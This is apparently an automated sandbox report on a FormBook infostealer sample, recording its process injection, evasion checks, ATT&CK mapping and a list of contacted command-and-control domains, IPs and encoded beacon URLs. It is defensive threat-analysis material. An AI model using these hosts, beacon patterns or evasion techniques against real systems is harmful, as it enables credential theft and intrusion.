          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452681 Sample: 85vLO1Rpcy.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 34 www.invisiongc.net 2->34 36 invisiongc.net 2->36 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 5 other signatures 2->46 11 85vLO1Rpcy.exe 2->11         started        signatures3 process4 signatures5 54 Detected unpacking (changes PE section rights) 11->54 56 Maps a DLL or memory area into another process 11->56 58 Tries to detect virtualization through RDTSC time measurements 11->58 14 85vLO1Rpcy.exe 11->14         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 28 jorgeporcayo.com 162.241.62.54, 49768, 80 UNIFIEDLAYER-AS-1US United States 17->28 30 sprinkleresources.com 78.47.57.7, 49762, 80 HETZNER-ASDE Germany 17->30 32 14 other IPs or domains 17->32 38 System process connects to network (likely due to code injection or exploit) 17->38 21 cscript.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          85vLO1Rpcy.exe48%ReversingLabsWin32.Trojan.Caynamer
          85vLO1Rpcy.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.85vLO1Rpcy.exe.2040000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          9.2.cscript.exe.4c87960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.1.85vLO1Rpcy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.85vLO1Rpcy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.cscript.exe.2848758.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.85vLO1Rpcy.exe.2080000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.melodezu.com/dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe
          http://www.sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.manageoceanaccount.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.jorgeporcayo.com/dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe
          http://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.iwccgroup.com/dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fitnesstwentytwenty.com/dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElP0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          fitnesstwentytwenty.com
          34.102.136.180
          truefalse
            unknown
            sprinkleresources.com
            78.47.57.7
            truetrue
              unknown
              www.professioneconsulenza.net
              89.46.109.25
              truetrue
                unknown
                jorgeporcayo.com
                162.241.62.54
                truetrue
                  unknown
                  invisiongc.net
                  34.102.136.180
                  truefalse
                    unknown
                    www.manageoceanaccount.com
                    104.21.40.211
                    truetrue
                      unknown
                      melodezu.com
                      64.227.87.162
                      truetrue
                        unknown
                        www.iwccgroup.com
                        104.21.86.209
                        truetrue
                          unknown
                          www.builtbydawn.com
                          172.67.129.33
                          truetrue
                            unknown
                            www.melodezu.com
                            unknown
                            unknowntrue
                              unknown
                              www.sprinkleresources.com
                              unknown
                              unknowntrue
                                unknown
                                www.fitnesstwentytwenty.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.mydreamtv.net
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.jorgeporcayo.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.saludflv.info
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.cwdelrio.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.invisiongc.net
                                          unknown
                                          unknowntrue
                                            unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.melodezu.com/dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtwtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtwtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtwfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.manageoceanaccount.com/dy8g/?4hoDb=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UFaZ0iHT58J1&m4L0u=bZcPvDKxdtwtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jorgeporcayo.com/dy8g/?4hoDb=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&m4L0u=bZcPvDKxdtwtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX&m4L0u=bZcPvDKxdtwtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.iwccgroup.com/dy8g/?4hoDb=7CAQNvso9+3ggABZu/Jc7fNLxaXC+FNFfFld5zwEvttFhfWBu0C0F7PZZ+Whh9hkxniW&m4L0u=bZcPvDKxdtwtrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            www.extinctionbrews.com/dy8g/true
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.fitnesstwentytwenty.com/dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtwfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtwtrue
                                            • Avira URL Cloud: safe
                                            unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.tiro.comexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.goodfont.co.krexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.carterandcone.comlexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.typography.netDexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://fontfabrik.comexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.%s.comPAexplorer.exe, 00000005.00000000.666867795.0000000002B50000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              low
                                                              http://www.fonts.comexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.sandoll.co.krexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.builtbydawn.com/dy8g/?4hoDb=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPcscript.exe, 00000009.00000002.918279591.0000000004E02000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.sakkal.comexplorer.exe, 00000005.00000000.686825310.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                172.67.129.33
                                                                www.builtbydawn.comUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                104.21.40.211
                                                                www.manageoceanaccount.comUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                162.241.62.54
                                                                jorgeporcayo.comUnited States
                                                                46606UNIFIEDLAYER-AS-1UStrue
                                                                64.227.87.162
                                                                melodezu.comUnited States
                                                                14061DIGITALOCEAN-ASNUStrue
                                                                34.102.136.180
                                                                fitnesstwentytwenty.comUnited States
                                                                15169GOOGLEUSfalse
                                                                78.47.57.7
                                                                sprinkleresources.comGermany
                                                                24940HETZNER-ASDEtrue
                                                                104.21.86.209
                                                                www.iwccgroup.comUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                89.46.109.25
                                                                www.professioneconsulenza.netItaly
                                                                31034ARUBA-ASNITtrue

                                                                General Information

                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                Analysis ID:452681
                                                                Start date:22.07.2021
                                                                Start time:17:56:55
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 9m 45s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:85vLO1Rpcy.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:19
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@7/0@12/8
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 18.7% (good quality ratio 15.7%)
                                                                • Quality average: 69.3%
                                                                • Quality standard deviation: 35.1%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                • TCP Packets have been reduced to 100
                                                                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 23.35.237.194, 92.122.145.220, 52.147.198.201, 104.43.193.48, 104.42.151.234, 20.50.102.62, 52.251.79.25, 23.216.77.146, 23.216.77.132, 40.112.88.60, 2.18.213.74, 2.18.213.56
                                                                • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452681/sample/85vLO1Rpcy.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                172.67.129.33PQMW0W5h3X.exeGet hashmaliciousBrowse
                                                                • www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0
                                                                0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                • www.builtbydawn.com/dy8g/?8pWL=Wlch&rVW8M4=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUElPwYvBfmvX
                                                                orders.exeGet hashmaliciousBrowse
                                                                • www.furlashop.site/ni6e/?W6=dhmVnxFiqqQHtzkp6eqPey57Y8PFMjt1OTneE2bUvMahMvc1ZtnhmpLaq/pNC70nk10eiFrAbg==&UlPt=GVoxsVvHVpd8Sl
                                                                104.21.40.211TeMdJqNMM0.exeGet hashmaliciousBrowse
                                                                • www.manageoceanaccount.com/dy8g/?Yn-PvXgP=zCCrdzdvThYaTASpe/hPmHk7ap5P+ANftyOGnlC77DjfTWm2yZ7w2vU9UG6jkznrjboy&x4=w4VXMtwX5BA
                                                                162.241.62.54v8kZUFgdD4.exeGet hashmaliciousBrowse
                                                                • www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx
                                                                QxnlprRUTx.exeGet hashmaliciousBrowse
                                                                • www.jorgeporcayo.com/dy8g/?Jn=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImX53aDppb+SR&2dM8l=bXbDpfbx6FA04L
                                                                TeMdJqNMM0.exeGet hashmaliciousBrowse
                                                                • www.jorgeporcayo.com/dy8g/?Yn-PvXgP=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUZNKSJRBZzW&x4=w4VXMtwX5BA
